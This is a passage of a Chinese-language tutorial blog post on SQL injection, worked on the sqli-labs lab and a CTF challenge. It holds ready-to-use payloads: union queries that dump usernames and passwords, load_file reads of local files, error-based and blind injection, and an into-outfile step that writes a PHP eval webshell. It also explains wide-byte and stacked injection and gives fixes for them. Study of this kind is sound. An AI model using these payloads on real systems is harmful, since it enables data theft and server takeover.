class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">一、判断是否用&#x27;做字符串引号</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;and 1=1 --+</span><br><span class="line">正常输出</span><br><span class="line">出错代表没有闭合  说明没有用&#x27;  可能没有用&#x27; 或用了&quot;或()</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+</span><br><span class="line">则是&#x27;&#x27;字符串注入</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">二、判断它所在的数据库有几列</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;order by 3 --+ 判断是否有3列</span><br><span class="line">正常</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;order by 4 --+ 判断是否有4列</span><br><span class="line">错误</span><br><span class="line">说明它输出的内容所在的数据库有3列</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">四、判断他显示的内容在数据库的第几列</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,2,3 --+</span><br><span class="line">则 Your Login name 在第二列 Your Password在第三列</span><br><span class="line">我选择在第二列输出我想要的内容</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">五、查找出当前用户权限</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,user(),3 --+</span><br><span class="line">root权限</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">六、查找当前数据库</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,database(),3 --+</span><br><span class="line">当前数据库是 security</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">七、查找security的表名</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =&#x27;security&#x27;),3 --+ </span><br><span class="line">表名是 emails,referers,uagents,users</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">八 、查找users里的字段</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = &#x27;security&#x27; and table_name = &#x27;users&#x27;),3 --+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">九、查找用户名</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(username) from security.users),3 --+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">十、查找密码</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(password) from security.users),3 --+</span><br><span class="line">这样 这个就完成了  已经拿到了账号密码 。</span><br></pre></td></tr></table></figure>

<p><strong>我们可以通过这些函数获得该数据库的一些重要的信息</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">version() ：数据库的版本     </span><br><span class="line"></span><br><span class="line">database() :当前所在的数据库   </span><br><span class="line"></span><br><span class="line">@<span class="variable">@basedir</span> :  数据库的安装目录</span><br><span class="line"></span><br><span class="line">@<span class="variable">@datadir</span> ：数据库文件的存放目录     </span><br><span class="line"></span><br><span class="line"><span class="keyword">user</span>() ：数据库的用户   </span><br><span class="line"></span><br><span class="line"><span class="built_in">current_user</span>() : 当前用户名</span><br><span class="line"></span><br><span class="line"><span class="built_in">system_user</span>() : 系统用户名     </span><br><span class="line"></span><br><span class="line"><span class="built_in">session_user</span>() :连接到数据库的用户名</span><br></pre></td></tr></table></figure>

<h4 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h4><p>当有显示列的时候，文件读可以利用 union 注入。当没有显示列的时候，只能利用盲注进行数据读取；</p>
<p>文件写入只能利用 union 注入</p>
<p>示例：读取e盘下3.txt文件</p>
<ul>
<li><strong>union注入读取文件</strong></li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span><span class="keyword">union</span>注入读取 e:<span class="operator">/</span><span class="number">3.</span>txt 文件</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;   union select 1,2,load_file(&quot;e:/3.txt&quot;)#</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">//也可以把 e:/3.txt 转换成16进制 0x653a2f332e747874</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>   <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,load_file(<span class="number">0x653a2f332e747874</span>)#</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYyqw8"><img src="https://z3.ax1x.com/2021/06/27/RYyqw8.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYyqw8.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYyqw8.png"></a></p>
<p>盲注读取文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>盲注读取的话就是利用hex函数，将读取的字符串转换成<span class="number">16</span>进制，再利用ascii函数，转换成ascii码，再利用二分法一个一个的判断字符，很复杂，一般结合工具完成</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; and ascii(mid((select hex(load_file(&#x27;</span>e:<span class="operator">/</span><span class="number">3.</span>txt<span class="string">&#x27;))),18,1))&gt;49#&#x27;</span> LIMIT <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>



<ul>
<li><p>union写入文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>利用<span class="keyword">union</span>注入写入一句话木马  <span class="keyword">into</span> outfile 和 <span class="keyword">into</span> dumpfile 都可以</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  union select 1,2,&#x27;</span><span class="operator">&lt;</span>?php <span class="variable">@eval</span>($_POST[aaa]);?<span class="operator">&gt;</span><span class="string">&#x27;  into outfile  &#x27;</span>e:<span class="operator">/</span><span class="number">4.</span>php<span class="string">&#x27; #</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">// 可以将一句话木马转换成16进制的形式</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>  <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">0x3c3f70687020406576616c28245f504f53545b6161615d293b3f3e</span>  <span class="keyword">into</span> outfile  <span class="string">&#x27;e:/4.php&#x27;</span> #</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p>**利用前提:**页面上没有显示位，但是需要输出 SQL 语句执行错误信息。比如 mysql_error()<br>优点: 不需要显示位<br>缺点: 需要输出 mysql_error( )的报错信息</p>
<ul>
<li><h3 id="floor报错注入"><a href="#floor报错注入" class="headerlink" title="floor报错注入"></a><strong>floor报错注入</strong></h3><p>floor报错注入是利用 count()函数 、rand()函数 、floor()函数 、group by 这几个特定的函数结合在一起产生的注入漏洞。缺一不可</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span> 我们可以将 <span class="keyword">user</span>() 改成任何函数，以获取我们想要的信息。具体可以看文章开头关于information_schema数据库的部分</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) #</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">//将其分解</span></span><br><span class="line"><span class="string">(select 1 from (Y)a)</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">Y= select count(*) from information_schema.tables group by concat(Z)</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">Z= user(),floor(rand(0)*2)           //将这里的 user() 替换成我们需要查询的函数</span></span><br></pre></td></tr></table></figure>

<p>**payload:**and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY6VfJ"><img src="https://z3.ax1x.com/2021/06/27/RY6VfJ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY6VfJ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY6VfJ.png"></a></p>
</li>
<li><p>floor报错注入总结</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">这里其实是二次查询注入</span><br><span class="line">这里在利用相关函数时，使用了两次select查询</span><br><span class="line">公式：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(测试语句))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查看当前数据库版本：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),version())a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查看数据库名：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),database())a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询表名：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 1,1))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询字段名：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name=&#x27;flag&#x27; limit 0,1))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询字段内容：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select flag from flag))a from information_schema.tables group by a)b</span><br></pre></td></tr></table></figure></li>
<li><h3 id="ExtractValue报错注入"><a href="#ExtractValue报错注入" class="headerlink" title="ExtractValue报错注入"></a><strong>ExtractValue报错注入</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EXTRACTVALUE (XML_document, XPath_string)</span><br></pre></td></tr></table></figure>

<ul>
<li><p>第一个参数：XML_document 是 String 格式，为 XML 文档对象的名称</p>
</li>
<li><p>第二个参数：XPath_string (Xpath 格式的字符串).</p>
<p>作用：从目标 XML 中返回包含所查询值的字符串</p>
<p>ps：返回结果 限制在32位字符</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span> 可以将 <span class="keyword">user</span>() 改成任何我们想要查询的函数和<span class="keyword">sql</span>语句 ,<span class="number">0x7e</span>表示的是 <span class="operator">~</span></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  and extractvalue(1,concat(0x7e,user(),0x7e))#</span></span><br><span class="line"><span class="string">// 通过这条语句可以得到所有的数据库名，更多的关于informaion_schema的使用看文章头部</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>  <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>))#</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY6GfH"><img src="https://z3.ax1x.com/2021/06/27/RY6GfH.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY6GfH.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY6GfH.png"></a></p>
</li>
</ul>
</li>
<li><p><strong>UpdateXml报错注入</strong></p>
<p>UpdateXml 函数实际上是去更新了XML文档，但是我们在XML文档路径的位置里面写入了子查询，我们输入特殊字符，然后就因为不符合输入规则然后报错了，但是报错的时候他其实已经执行了那个子查询代码！</p>
<ul>
<li>```<br>UPDATEXML (XML_document, XPath_string, new_value)<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- 第一个参数：XML_document 是 String 格式，为 XML 文档对象的名称，文中为 Doc 1</span><br><span class="line">- 第二个参数：XPath_string (Xpath 格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程。</span><br><span class="line">- 第三个参数：new_value，String 格式，替换查找到的符合条件的数据</span><br><span class="line"></span><br><span class="line">  作用：改变文档中符合条件的节点的值</span><br><span class="line"></span><br></pre></td></tr></table></figure>
// 可以将 user() 改成任何我们想要查询的函数和sql语句 ,0x7e表示的是 ~<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli/Less-1/?id=-1&#39;">http://127.0.0.1/sqli/Less-1/?id=-1&#39;</a>  and updatexml(1,concat(0x7e,user(),0x7e),1)#<br>// 通过这条语句可以得到所有的数据库名<br>?id=1 ‘ union select updatexml(1,concat(0x7e,(select database()),0x7e),1) –+<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">    [![RY6H39.png](https://z3.ax1x.com/2021/06/27/RY6H39.png)](https://imgtu.com/i/RY6H39)</span><br><span class="line"></span><br><span class="line">#### REGEXP正则匹配</span><br><span class="line"></span><br><span class="line">正则表达式，又称规则表达式（Regular Expression，在代码中常简写为regex、regexp或RE），计算机科学的一个概念。正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本</span><br><span class="line"></span><br><span class="line">[![Rt3AVx.png](https://z3.ax1x.com/2021/06/28/Rt3AVx.png)](https://imgtu.com/i/Rt3AVx)</span><br><span class="line"></span><br><span class="line">在&#123;&#125;内只有一个整型参数i，表示字符只能出现i次；在&#123;&#125;内有一个整型参数i，后面跟一个&quot;，”，表示字符可以出现i次或i次以上；在&#123;&#125;内只有一个整型参数i，后面跟一个“，&quot;，再跟一个整型参数j,表示字符只能出现i次以上，j次以下（包括i次和j次）。其中的整型参数必须大于等于0，小于等于 RE_DUP_MAX（默认是255)。 如果有两个参数，第二个必须大于等于第一个</span><br><span class="line"></span><br><span class="line">[a-dX]</span><br><span class="line"></span><br><span class="line">匹配“a”、“b”、“c”、“d”或“X”</span><br><span class="line"></span><br><span class="line">[^a-dX]</span><br><span class="line"></span><br><span class="line">匹配除“a”、“b”、“c”、“d”、“X”以外的任何字符。</span><br><span class="line"></span><br><span class="line">“[”、“]”必须成对使用</span><br><span class="line"></span><br><span class="line">```mysql</span><br><span class="line">mysql&gt; select &quot;aXbc&quot; REGEXP &quot;[a-dXYZ]&quot;; -&gt; 1（表示匹配） </span><br><span class="line">mysql&gt; select &quot;aXbc&quot; REGEXP &quot;^[a-dXYZ]$&quot;; -&gt; 0（表示不匹配） </span><br><span class="line">mysql&gt; select &quot;aXbc&quot; REGEXP &quot;^[a-dXYZ]+$&quot;; -&gt; 1（表示匹配） </span><br><span class="line">mysql&gt; select &quot;aXbc&quot; REGEXP &quot;^[^a-dXYZ]+$&quot;; -&gt; 0（表示不匹配） </span><br><span class="line">mysql&gt; select &quot;gheis&quot; REGEXP &quot;^[^a-dXYZ]+$&quot;; -&gt; 1（表示匹配） </span><br><span class="line">mysql&gt; select &quot;gheisa&quot; REGEXP &quot;^[^a-dXYZ]+$&quot;; -&gt; 0（表示不匹配）</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<p>已知数据库名为 security，判断第一个表的表名是否以 a-z 中的字符开头，^[a-z] –&gt; ^a ; 判断出了第一个表的第一个字符，接着判断第一个表的第二个字符 ^a[a-z] –&gt; ^ad ; 就这样，一步一步判断第一个表的表名 ^admin$ 。然后 limit 1，1 判断第二个表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 判断security数据库下的第一个表的是否以a-z的字母开头</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27; and  1=(select 1 from information_schema.tables where table_schema=&#x27;security&#x27; and table_name regexp &#x27;^[a-z]&#x27; limit 0,1) #</span><br></pre></td></tr></table></figure>

<h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><p>宽字节注入是由于不同编码中中英文所占字符的不同所导致的。通常来说，在GBK编码当中，一个汉字占用2个字节。而在UTF-8编码中，一个汉字占用3个字节。在php中，我们可以通过输入 echo strlen(“中”) 来测试，当为GBK编码时，输入2，而为UTF-8编码时，输出3。除了GBK以外，所有的ANSI编码都是中文都是占用两个字节。</p>
<p>相关文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/84138312">https://blog.csdn.net/qq_36119192/article/details/84138312</a></p>
<p>在说之前，我们先说一下php中对于sql注入的过滤，这里就不得不提到几个函数了。</p>
<p>addslashes()函数，这个函数在预定义字符之前添加反斜杠 \ 。预定义字符： 单引号 ‘ 、双引号 “ 、反斜杠 \ 、NULL。但是这个函数有一个特点就是虽然会添加反斜杠 \ 进行转义，但是 \ 并不会插入到数据库中。。这个函数的功能和魔术引号完全相同，所以当打开了魔术引号时，不应使用这个函数。可以使用 get_magic_quotes_gpc() 来检测是否已经转义。</p>
<p>mysql_real_escape_string() 函数，这个函数用来转义sql语句中的特殊符号x00 、\n  、\r  、\ 、‘ 、“ 、x1a。</p>
<p><strong>魔术引号</strong>：当打开时，所有的单引号’、双引号”、反斜杠\ 和 NULL 字符都会被自动加上一个反斜线来进行转义，这个和 addslashes()函数的作用完全相同。所以，如果魔术引号打开了，就不要使用addslashes()函数了。一共有三个魔术引号指令。</p>
<ol>
<li>magic_quotes_gpc 影响到 HTTP 请求数据（GET，POST 和 COOKIE）。不能在运行时改变。在 PHP 中默认值为 on。参见 get_magic_quotes_gpc()。</li>
<li>magic_quotes_runtime 如果打开的话，大部份从外部来源取得数据并返回的函数，包括从数据库和文本文件，所返回的数据都会被反斜线转义。该选项可在运行的时改变，在 PHP 中的默认值为 off。参见 set_magic_quotes_runtime() 和 get_magic_quotes_runtime()。</li>
<li>magic_quotes_sybase 如果打开的话，将会使用单引号对单引号进行转义而非反斜线。此选项会完全覆盖 magic_quotes_gpc。如果同时打开两个选项的话，单引号将会被转义成 ‘’。而双引号、反斜线 和 NULL 字符将不会进行转义。如何取得其值参见 ini_get()</li>
</ol>
<ul>
<li><p>我们这里搭了一个bugkuCTF练习平台的题目为例：</p>
</li>
<li><p>题目：sql注入</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcJET"><img src="https://z3.ax1x.com/2021/06/27/RYcJET.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcJET.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcJET.png"></a></p>
</li>
</ul>
<p><strong>宽字节注入的修复</strong></p>
<p>在调用 mysql_real_escape_string() 函数之前，先设置连接所使用的字符集为GBK ，mysql_set_charset=(‘gbk’,$conn) 。这个方法是可行的。但是还是有很多网站是使用的addslashes()函数进行过滤，我们不可能把所有的addslashes()函数都换成mysql_real_escape_string()。</p>
<p>所以防止宽字节注入的另一个方法就是将 character_set_client 设置为binary(二进制)。需要在所有的sql语句前指定连接的形式是binary二进制：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql_query(&quot;SET character_set_connection=gbk, character_set_results=gbk,character_set_client=binary&quot;, $conn); </span><br></pre></td></tr></table></figure>

<p>当我们的MySQL收到客户端的请求数据后，会认为他的编码是character_set_client所对应的编码，也就是二进制。然后再将它转换成character_set_connection所对应的编码。然后进入具体表和字段后，再转换成字段对应的编码。当查询结果产生后，会从表和字段的编码转换成character_set_results所对应的编码，返回给客户端。所以，当我们将character_set_client编码设置成了binary，就不存在宽字节注入的问题了，所有的数据都是以二进制的形式传递。</p>
<h4 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h4><p>堆叠注入，顾名思义，就是将语句堆叠在一起进行查询<br>原理很简单，mysql_multi_query() 支持多条sql语句同时执行，就是个;分隔，成堆的执行sql语句，例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users;show databases;</span><br></pre></td></tr></table></figure>

<p>就同时执行以上两条命令，所以我们可以增删改查，只要权限够<br>虽然这个注入姿势很牛逼，但实际遇到很少，其可能受到API或者数据库引擎，又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用，利用mysqli_multi_query()函数就支持多条sql语句同时执行，但实际情况中，如PHP为了防止sql注入机制，往往使用调用数据库的函数是mysqli_ query()函数，其只能执行一条语句，分号后面的内容将不会被执行，所以可以说堆叠注入的使用条件十分有限，一旦能够被使用，将可能对网站造成十分大的威胁</p>
<ul>
<li> <strong>漏洞造成代码分析</strong></li>
</ul>
<p>  sqli-labs38</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcLGQ"><img src="https://z3.ax1x.com/2021/06/27/RYcLGQ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcLGQ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcLGQ.png"></a></p>
<p>  对输入的参数没有进行严格的过滤，攻击者构造恶意的攻击语句造成了SQL注入攻击，存在回显点，可以进行联合注入，并且如果出现错误，会输出报错信息，这里也可以使用显错注入。<br>  还可以看到，这里的SQL语句查询使用的是mysqli_multi_query函数，mysqli_multi_query函数可以执行多条SQL语句。</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcxrq"><img src="https://z3.ax1x.com/2021/06/27/RYcxrq.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcxrq.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcxrq.png"></a></p>
<p>  可以看到，我们堆叠查询的语句执行成功，那么我们可以在堆叠的SQL语句使用时间盲注的语句。</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYczq0"><img src="https://z3.ax1x.com/2021/06/27/RYczq0.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYczq0.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYczq0.png"></a></p>
<p>  上面这个代码，程序获取GET参数ID，使用PDO的方式进行数据查询，但仍然将参数ID拼接到查询语句，导致PDO没起到预编译的效果，程序仍然存在SQL注入漏洞。<br>  使用PDO执行SQL语句时，可以执行多条语句，不过这样通常不能直接得到注入结果，因为PDO只会返回第一条SQL语句执行的结果，所以在第二条语句中可以用update更新数据或者使用时间盲注获取数据。</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgCIU"><img src="https://z3.ax1x.com/2021/06/27/RYgCIU.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgCIU.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgCIU.png"></a></p>
<p>  <strong>总结</strong></p>
<p>  这个注入方式并不是很常用，理解和使用也较为简单，但是利用姿势比较多样特别，要多加理解和运用。</p>
<h4 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h4><p>二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言，二次注入漏洞更难以被发现，但是它却具有与一次注入攻击漏洞相同的攻击威力。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgFG4"><img src="https://z3.ax1x.com/2021/06/27/RYgFG4.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgFG4.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgFG4.png"></a></p>
<ol>
<li>黑客通过构造数据的形式，在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。</li>
<li>服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。</li>
<li>黑客向服务端发送第二个与第一次不相同的请求数据信息。</li>
<li>服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。</li>
<li>服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgBWQ"><img src="https://z3.ax1x.com/2021/06/27/RYgBWQ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgBWQ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgBWQ.png"></a></p>
<h4 id="User-Agent注入"><a href="#User-Agent注入" class="headerlink" title="User-Agent注入"></a>User-Agent注入</h4><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgLTK"><img src="https://z3.ax1x.com/2021/06/27/RYgLTK.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgLTK.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgLTK.png"></a></p>
